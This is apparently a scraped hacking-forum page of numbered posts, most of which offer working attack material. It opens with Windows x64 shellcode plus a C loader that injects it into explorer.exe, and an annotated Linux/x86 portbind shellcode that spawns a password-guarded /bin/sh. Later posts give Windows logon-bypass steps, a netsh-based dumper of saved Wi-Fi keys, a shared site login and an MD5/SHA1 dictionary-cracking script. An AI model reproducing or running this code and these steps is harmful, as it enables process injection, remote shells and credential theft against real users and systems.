    "\x99\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0c\x24\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x44\x8b\x73\x1c\x4d\x01\xfe\x66\xba\xc8\x01\x41\x8b\x1c\x16\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\xff\xd3\x48\x83\xec\x58\x48\x83\xec\x58\x48\x31\xd2\x66\xba\x88\x01\x41\x8b\x1c\x16\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x41\x8b\x5e\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x09\xbd\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x41\x8b\x5e\x30\x4c\x01\xfb\x6a\x01\x5a\x4c\x89\xe9\xff\xd3\x48\x83\xec\x58\xeb\x12\x48\x83\xc4\x58\x41\x8b\x5e\x08\x4c\x01\xfb\x49\x8b\x4c\x24\xf8\xff\xd3\x41\x8b\x1e\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x49\x89\x44\x24\xf8\x41\x8b\x5e\x48\x4c\x01\xfb\x49\x8b\x4c\x24\xf8\x41\xc7\x04\x24\x2d\x2d\x3e\x20\x49\x8d\x14\x24\x6a\x04\x41\x58\x4d\x31\xc9\x48\x83\xec\x58\xff\xd3\x41\x8b\x5e\x3c\x4c\x01\xfb\x4d\x31\xc9\x6a\x08\x41\x58\x49\x8d\x14\x24\x49\x8b\x4c\x24\xf8\xff\xd3\x41\x81\x3c\x24\x68\x32\x37\x31\x0f\x85\x7b\xff\xff\xff\x41\x81\x7c\x24\x04\x35\x30\x38\x46\x0f\x85\x6c\xff\xff\xff\x8b\x5e\x44\x48\x01\xfb\xff\xd3\x48\x31\xd2\x41\xc7\x04\x24\x75\x73\x65\x72\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\xff\xd3\x49\x89\xc6\x41\xc7\x04\x24\x46\x69\x6e\x64\x41\xc7\x44\x24\x04\x57\x69\x6e\x64\x41\xc7\x44\x24\x08\x6f\x77\x41\x41\x41\x80\x74\x24\x0b\x41\x48\x31\xd2\x66\xba\x2c\x09\x44\x8b\x2c\x16\x49\x01\xfd\x49\x8d\x14\x24\x4c\x89\xf1\x41\xff\xd5\x48\x31\xd2\x41\xc7\x04\x24\x43\x6f\x6e\x73\x41\xc7\x44\x24\x04\x6f\x6c\x65\x57\x41\xc7\x44\x24\x08\x69\x6e\x64\x6f\x41\xc7\x44\x24\x0c\x77\x43\x6c\x61\x66\x41\xc7\x44\x24\x10\x73\x73\x41\x88\x54\x24\x12\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd0\x48\x31\xd2\x41\xc7\x04\x24\x53\x68\x6f\x77\x41\xc7\x44\x24\x04\x57\x69\x6e\x64\x66\x41\xc7\x44\x24\x08\x6f\x77\x41\x88\x54\x24\x0a\x49\x8d\x14\x24\x4c\x89\xf1\x41\x55\x5b\x49\x89\xc5\xff\xd3\x4c\x89\xe9\x48\x31\xd2\xff\xd0\x4d\x31\xc0\x41\x50\x5a\x66\xba\x1f\x04\x8b\x1c\x96\x48\x01\xfb\x41\x50\x5a\xb2\x80\x49\x8d\x0c\x24\xff\xd3\x48\x31\xd2\x41\xc7\x44\x24\xf4\x63\x6d\x64\x41\x41\x88\x54\x24\xf7\xb2\x68\x49\x89\x14\x24\xb2\xff\x48\xff\xc2\x49\x8b\x44\x24\xf8\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x48\x83\xec\x58\x48\x31\xc9\x4d\x31\xc9\x6a\x01\x41\x58\x4c\x89\x44\x24\x20\x48\x89\x4c\x24\x28\x48\x89\x4c\x24\x30\x48\x89\x4c\x24\x38\x49\x8d\x14\x24\x48\x89\x54\x24\x40\x49\x8d\x54\x24\x68\x48\x89\x54\x24\x48\x4d\x31\xc0\x49\x8d\x54\x24\xf4\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x48\x01\xfb\xff\xd3\x48\x31\xd2\x52\x66\xba\x29\x01\x8b\x1c\x96\x48\x01\xfb\x59\x48\x83\xc4\x58\xff\xd3";

    int main()
    {
        HANDLE s,proc;
        PROCESSENTRY32 ps;
        BOOL process_found=0;
        LPVOID shell;
        SIZE_T total;

        //finding explorer.exe pid
        ps.dwSize=sizeof(ps);
        s=CreateToolhelp32Snapshot(2,0);
        if(s==INVALID_HANDLE_VALUE)
        {
            printf("CreateToolhelp32Snapshot() failed. Error code %lu\n",GetLastError());
            return -1;
        }

        if(!Process32First(s,&ps))
        {
            printf("Process32First() failed. Error code %lu\n",GetLastError());
            return -1;
        }

        do{
            if(0==strcmp(ps.szExeFile,"explorer.exe"))
            {
                process_found=1;
                break;
            }
        }while(Process32Next(s,&ps));

        if(!process_found)
        {
            printf("Unknown Process\n");
            return -1;
        }

        //opening process using pid
        //OpenProcess() returns NULL on failure, not INVALID_HANDLE_VALUE
        proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);
        if(proc==NULL)
        {
            printf("OpenProcess() failed. Error code %lu\n",GetLastError());
            return -1;
        }

        //allocating memory in the process
        if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)
        {
            printf("Failed to allocate memory into process");
            CloseHandle(proc);
            return -1;
        }

        //writing shellcode into process memory
        WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);
        if(sizeof(shellcode)!=total)
        {
            printf("Failed write shellcode into process memory");
            CloseHandle(proc);
            return -1;
        }

        //Executing shellcode
        if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)
        {
            printf("Failed to Execute shellcode");
            CloseHandle(proc);
            return -1;
        }

        CloseHandle(proc);
        CloseHandle(s);
        return 0;
    }
  18.

    /*
     * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86
     * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
     *
     * portbind shellcode that bind()'s a shell on port 64713/tcp
     * and requests a user password.
     *
     */

    #include <stdio.h>
    #include <string.h>

    char shellcode[] =
        /* socket(AF_INET, SOCK_STREAM, 0) */
        "\x6a\x66"              // push   $0x66
        "\x58"                  // pop    %eax
        "\x6a\x01"              // push   $0x1
        "\x5b"                  // pop    %ebx
        "\x99"                  // cltd
        "\x52"                  // push   %edx
        "\x53"                  // push   %ebx
        "\x6a\x02"              // push   $0x2
        "\x89\xe1"              // mov    %esp,%ecx
        "\xcd\x80"              // int    $0x80

        /* bind(s, server, sizeof(server)) */
        "\x52"                  // push   %edx
        "\x66\x68\xfc\xc9"      // pushw  $0xc9fc      // PORT = 64713
        "\x66\x6a\x02"          // pushw  $0x2
        "\x89\xe1"              // mov    %esp,%ecx
        "\x6a\x10"              // push   $0x10
        "\x51"                  // push   %ecx
        "\x50"                  // push   %eax
        "\x89\xe1"              // mov    %esp,%ecx
        "\x89\xc6"              // mov    %eax,%esi
        "\x43"                  // inc    %ebx
        "\xb0\x66"              // mov    $0x66,%al
        "\xcd\x80"              // int    $0x80

        /* listen(s, anything) */
        "\xb0\x66"              // mov    $0x66,%al
        "\xd1\xe3"              // shl    %ebx
        "\xcd\x80"              // int    $0x80

        /* accept(s, 0, 0) */
        "\x52"                  // push   %edx
        "\x52"                  // push   %edx
        "\x56"                  // push   %esi
        "\x89\xe1"              // mov    %esp,%ecx
        "\x43"                  // inc    %ebx
        "\xb0\x66"              // mov    $0x66,%al
        "\xcd\x80"              // int    $0x80
        "\x96"                  // xchg   %eax,%esi

        /* send(s, "Password: ", 0x0a, flags) */
        "\x52"                  // push   %edx
        "\x68\x72\x64\x3a\x20"  // push   $0x203a6472
        "\x68\x73\x73\x77\x6f"  // push   $0x6f777373
        "\x66\x68\x50\x61"      // pushw  $0x6150
        "\x89\xe7"              // mov    %esp,%edi
        "\x6a\x0a"              // push   $0xa
        "\x57"                  // push   %edi
        "\x56"                  // push   %esi
        "\x89\xe1"              // mov    %esp,%ecx
        "\xb3\x09"              // mov    $0x9,%bl
        "\xb0\x66"              // mov    $0x66,%al
        "\xcd\x80"              // int    $0x80

        /* recv(s, *buf, 0x08, flags) */
        "\x52"                  // push   %edx
        "\x6a\x08"              // push   $0x8
        "\x8d\x4c\x24\x08"      // lea    0x8(%esp),%ecx
        "\x51"                  // push   %ecx
        "\x56"                  // push   %esi
        "\x89\xe1"              // mov    %esp,%ecx
        "\xb3\x0a"              // mov    $0xa,%bl
        "\xb0\x66"              // mov    $0x66,%al
        "\xcd\x80"              // int    $0x80
        "\x87\xf3"              // xchg   %esi,%ebx

        /* like: strncmp(string1, string2, 0x8) */
        "\x52"                  // push   %edx
        "\x68\x61\x75\x6c\x74"  // push   $0x746c7561  // password
        "\x68\x67\x6f\x74\x66"  // push   $0x66746f67  // here
        "\x89\xe7"              // mov    %esp,%edi
        "\x8d\x74\x24\x1c"      // lea    0x1c(%esp),%esi
        "\x89\xd1"              // mov    %edx,%ecx
        "\x80\xc1\x08"          // add    $0x8,%cl
        "\xfc"                  // cld
        "\xf3\xa6"              // repz cmpsb %es:(%edi),%ds:(%esi)
        "\x74\x04"              // je     dup

        /* exit(something) */
        "\xf7\xf0"              // div    %eax
        "\xcd\x80"              // int    $0x80

        /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
        "\x6a\x02"              // push   $0x2
        "\x59"                  // pop    %ecx
        "\xb0\x3f"              // mov    $0x3f,%al
        "\xcd\x80"              // int    $0x80
        "\x49"                  // dec    %ecx
        "\x79\xf9"              // jns    dup_loop

        /* execve("/bin/sh", ["/bin/sh"], NULL) */
        "\x6a\x0b"              // push   $0xb
        "\x58"                  // pop    %eax
        "\x52"                  // push   %edx
        "\x68\x2f\x2f\x73\x68"  // push   $0x68732f2f
        "\x68\x2f\x62\x69\x6e"  // push   $0x6e69622f
        "\x89\xe3"              // mov    %esp,%ebx
        "\x52"                  // push   %edx
        "\x53"                  // push   %ebx
        "\x89\xe1"              // mov    %esp,%ecx
        "\xcd\x80";             // int    $0x80

    int main()
    {
        int (*f)() = (int(*)())shellcode;
        printf("Length: %zu\n", strlen(shellcode));
        f();
        return 0;
    }
  19. 197

    Miscellaneous

    13 - Improving Password Security
  20. 197

    Miscellaneous

    12 - Attacking Passwords
  21. Moeein Seven

    Cracking

    Hello. I have prepared the best password lists of the year for you in the package below. Download link: http://uupload.ir/view/vbe5_pass_list.rar
  22. ReZa CLONER

    Computer passwords are one of the most important parts of a computer's security. These passwords are what, to some extent, increase the computer's security against hackers and people who want to get at your personal information without permission, but there are other ways in that many of us do not know about, and anyone who knows them can get into your personal computer. In this article I want to teach you these entry routes and also how to close them. If the screen where we have to enter the password appears when Windows first loads, this screen comes in two forms: one with a picture that we have to click on, and one where we enter a username and password. If the screen with the picture appears, we can press Alt, Ctrl and Delete (alt,ctrl,delete) twice so that the screen we want opens. Now we want to get past the password without knowing it. Type administrator in the username field and press Enter. Now the computer goes to the desktop and the computer is open. The point here is that some people know about this and put a password on this username too, but they do not know that Windows itself has accounts we can use to get into the computer. Now, if the computer did not open with the username administrator, enter guest instead, which will open 100 percent of the time, and if, with a small, very small, probability it does not, there is no other way in. Now that it is open, the information you want may be on the main user and you have to get into it. To do that, go to the Start menu and open Run; you can do this by pressing the R key on the keyboard. Now type the following phrase in that field: control userpasswords2. Now find the person's username and, to change their password, click Reset Password at the bottom. Now, by entering your password once and repeating it once, the computer's password is changed. If you want to close this entry route, click on the Guest account and click Reset Password. Now, by repeating the previous step, nobody else can get into your computer.
  23. Milad shadow

    First method: open cmd (I think everyone knows how to open cmd by now). Then enter the following:

    netsh wlan show profiles

    Now the names of all the Wi-Fi networks you have connected to appear. Next, type the following:

    netsh wlan show profiles wifiname key=clear

    Note that you put your own Wi-Fi name in place of wifiname. Now take the password from the Key Content field.

    Second method: while you are connected to the Wi-Fi, open Control Panel and choose the following option: Network and Sharing Center. Now click on your Wi-Fi's name, click Wireless Properties, go to the Security tab, tick the Show... option and read the password.
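    The two manual netsh steps above can be run for every saved profile at once. The PowerShell below is an added example, not part of the post: it enumerates the saved profiles, asks netsh for each one with key=clear, and pulls out the Key Content value. It is Windows only, assumes English-locale netsh labels ("Key Content"), and returns $null for open networks that store no key; the function name is the example's own.

```powershell
# Added example (not from the post): dump every saved Wi-Fi profile and its
# stored key by wrapping the two netsh commands the post uses by hand.
# Windows only. Profiles saved for all users need an elevated prompt.

function Get-SavedWifiKey {
    # Profile lines in "netsh wlan show profiles" are indented four spaces and
    # have the form "    All User Profile     : HomeNet"; the label is localized,
    # so match on the indent and the " : " separator rather than the label text.
    $names = foreach ($line in (netsh wlan show profiles)) {
        if ($line -match '^\s{4}.+?\s+:\s+(.+?)\s*$') { $Matches[1] }
    }

    foreach ($name in $names) {
        # Quoting "name=$name" as one argument keeps profile names with spaces intact.
        $detail = netsh wlan show profile "name=$name" key=clear

        # Open networks have no "Key Content" line at all; report them with a null key.
        # This label is localized on non-English Windows (assumption: English labels).
        $key = $null
        foreach ($d in $detail) {
            if ($d -match 'Key Content\s*:\s*(.+?)\s*$') { $key = $Matches[1]; break }
        }

        [pscustomobject]@{
            Profile = $name
            Key     = $key
        }
    }
}

# Usage:
Get-SavedWifiKey | Format-Table -AutoSize
```

    The same data is what an attacker with a shell on the machine collects, which is the reason a laptop that has joined a corporate Wi-Fi network should not be left logged in and unattended.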
  24. Mr Fucker

    Address: https://www.1kingmovi.in. How to use: this account is only suitable for a download manager. First register so that the links are displayed, then enter the username and password when downloading a film. User:pass moslem:moslem
  25. We will learn the basic principles of password cracking and all the essential password-cracking techniques. I am currently working on the Linux tutorial, but I will also post a THC Hydra tutorial and a Wi-Fi hacking tutorial at a professional level.

    The importance of password cracking and its methods: passwords are, in general, the authentication system for internet users. People all over the world use usernames and passwords, for example the PIN of their bank account, their email, and so on. For a hacker it is essential to know some cracking. Although some people's passwords are hacked easily (some say "let's set a password we won't forget"), there are people who set difficult passwords, so cracking theirs is very hard. In those cases, someone who wants to crack them can use tools such as (botnet, supercomputer, GPU, ASIC, etc.) or use other methods to crack them. We can never write down all the methods. In the future I will teach you how to steal people's cookies to get access to their Facebook accounts. Now let's start with the basics.

    Password storage: you have probably come across the word hash before. Usually, so that their password cannot be read, people store it as a hash; this system is usually MD5 or SHA1. In Windows, passwords are stored on the local system in the SAM file, while Linux stores them in /etc/shadow. You need root access to get at this file.
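    The post names MD5 and SHA1 as the usual storage formats. The PowerShell below is an added example, not part of the post, showing the simplest attack against them: hash each wordlist entry once and look every user's digest up in the result. The usernames, digests and wordlist are constructed for the demo (two digests are those of very common passwords, the third is a placeholder that will not crack); the function names are the example's own. Because neither MD5 nor SHA1 is salted, one candidate hash is checked against all users at once, which is exactly why unsalted fast hashes are weak.

```powershell
# Added example (not from the post): dictionary attack against unsalted
# MD5 / SHA1 password digests. All sample data below is constructed.

function Get-HexHash {
    param(
        [Parameter(Mandatory)][string]$Text,
        [Parameter(Mandatory)][ValidateSet('MD5','SHA1')][string]$Algorithm
    )
    $algo = switch ($Algorithm) {
        'MD5'  { [System.Security.Cryptography.MD5]::Create() }
        'SHA1' { [System.Security.Cryptography.SHA1]::Create() }
    }
    try {
        $digest = $algo.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Text))
        # BitConverter gives "5F-4D-..."; strip the dashes and lower-case it.
        return ([System.BitConverter]::ToString($digest) -replace '-', '').ToLowerInvariant()
    } finally {
        $algo.Dispose()
    }
}

function Invoke-DictionaryAttack {
    param(
        [Parameter(Mandatory)][hashtable]$Targets,   # user -> hex digest
        [Parameter(Mandatory)][string[]]$Wordlist,
        [Parameter(Mandatory)][ValidateSet('MD5','SHA1')][string]$Algorithm
    )
    # Hash every candidate once. With no salt, the same table serves every
    # target, so cost is O(wordlist), not O(wordlist x users).
    $lookup = @{}
    foreach ($word in $Wordlist) {
        $lookup[(Get-HexHash -Text $word -Algorithm $Algorithm)] = $word
    }

    foreach ($user in $Targets.Keys) {
        $digest  = $Targets[$user].ToLowerInvariant()
        $cracked = $lookup.ContainsKey($digest)
        [pscustomobject]@{
            User      = $user
            Algorithm = $Algorithm
            Cracked   = $cracked
            Password  = $(if ($cracked) { $lookup[$digest] } else { $null })
        }
    }
}

# Constructed sample data: two users with very common passwords, one whose
# digest is a placeholder that is not in the wordlist and stays uncracked.
$md5Targets = @{
    alice = '5f4dcc3b5aa765d61d8327deb882cf99'
    bob   = 'e10adc3949ba59abbe56e057f20f883e'
    carol = '00000000000000000000000000000000'   # placeholder, not a real digest
}
$wordlist = 'letmein', 'qwerty', 'password', '123456', 'iloveyou'

Invoke-DictionaryAttack -Targets $md5Targets -Wordlist $wordlist -Algorithm MD5 |
    Format-Table -AutoSize
```

    Swap -Algorithm SHA1 and SHA1 digests into $Targets and the same code runs unchanged; the defence is not a different fast hash but a slow, salted scheme (bcrypt, scrypt, Argon2), which is what the SAM and /etc/shadow formats mentioned in the post are moving toward on modern systems.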
